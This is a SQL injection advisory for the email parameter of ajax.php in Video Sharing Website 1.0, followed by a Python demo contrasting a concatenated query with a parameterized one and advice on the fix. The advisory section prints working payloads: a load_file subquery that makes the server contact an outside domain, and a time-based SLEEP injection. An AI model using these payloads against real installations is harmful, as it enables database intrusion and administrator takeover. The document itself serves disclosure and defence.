Video-Sharing-Website
Vendor
Description:
The email parameter of ajax.php in Video Sharing Website 1.0 appears to be vulnerable to SQL injection. The payload '+(select load_file('\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\pkq'))+' was submitted in the email parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a host on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed. An attacker can take control of the administrator account on this system.
Status: CRITICAL
[+] Payload:
---
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=jsmith@sample.com'+(select load_file('\\\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\\pkq'))+'' AND (SELECT 8549 FROM (SELECT(SLEEP(5)))PJEk) AND 'yreq'='yreq&password=jsmith123
---
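
The vulnerable and the fixed query pattern side by side, as an added example that is not code from the application or from this advisory. Assumptions: the `users` table, its columns and both login functions are hypothetical (the source of ajax.php is not shown here), SQLite stands in for MySQL so the demo runs offline, and `load_file` is a recording stub that opens nothing.

```python
import sqlite3

# Payload quoted in the advisory, submitted as the "email" POST field.
PAYLOAD = r"'+(select load_file('\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\pkq'))+'"


def make_db():
    """In-memory stand-in for the application's database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (email TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('jsmith@sample.com', 'jsmith123')")
    calls = []

    def load_file_stub(path):
        # Records the argument instead of opening anything; MySQL's real
        # load_file() would try to read the UNC path at this point.
        calls.append(path)
        return None

    db.create_function("load_file", 1, load_file_stub)
    return db, calls


def login_concatenated(db, email, password):
    """Vulnerable pattern: request values are spliced into the SQL text."""
    sql = ("SELECT email FROM users WHERE email = '" + email +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchall()


def login_parameterized(db, email, password):
    """Hardened pattern: values are bound and never parsed as SQL."""
    sql = "SELECT email FROM users WHERE email = ? AND password = ?"
    return db.execute(sql, (email, password)).fetchall()


def demo():
    """Return (stub calls via concatenation, stub calls via binding, rows)."""
    db, calls = make_db()
    login_concatenated(db, PAYLOAD, "jsmith123")
    hits_concat = list(calls)
    calls.clear()
    rows = login_parameterized(db, PAYLOAD, "jsmith123")
    return hits_concat, list(calls), rows


if __name__ == "__main__":
    print(demo())
```

In the PHP application the same fix is a PDO or mysqli prepared statement with bound parameters. Revoking the FILE privilege from the application's MySQL account also stops load_file from reading anything.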
